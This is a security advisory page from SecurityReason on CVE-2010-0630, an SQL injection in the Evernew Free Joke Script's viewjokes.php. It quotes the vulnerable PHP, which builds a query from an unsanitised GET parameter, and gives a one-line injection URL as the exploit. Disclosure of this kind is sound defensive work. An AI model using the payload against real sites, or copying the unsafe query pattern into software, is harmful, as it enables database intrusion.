|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7019 CVE : CVE-2010-0630 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : Hamza 'MizoZ' N. Published : 16.02.2010
Advisory Content : /* Name : Evernew Free Joke Script (viewjokes.php) SQL Injection WebSite : www.evernewscripts.com Download : http://www.evernewscripts.com/free-php-scripts/jokescript1.2.zip Author : Hamza 'MizoZ' N. Email : mizozx@gmail.com Greetz : Zuka , int_0x80 , geeksec.com ... a loot */ # VULN CODE ]--[ viewjokes.php : $id=$HTTP_GET_VARS['id']; $title=$HTTP_GET_VARS['title']; stuffViewer($id, 'jokes'); $query="select * from jokes where id=$id"; $allresults=mysql_query($query); $viewjokes=mysql_fetch_array($allresults); # EXPLOIT : http://[THINGS ...]/viewjokes.php?id=5+and+(select 1)=1-- References : http://xforce.iss.net/xforce/xfdb/56043
http://www.securityfocus.com/bid/38020
http://www.exploit-db.com/exploits/11306
http://secunia.com/advisories/35434
http://packetstormsecurity.org/1002-exploits/evernewfjs-sql.txt  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |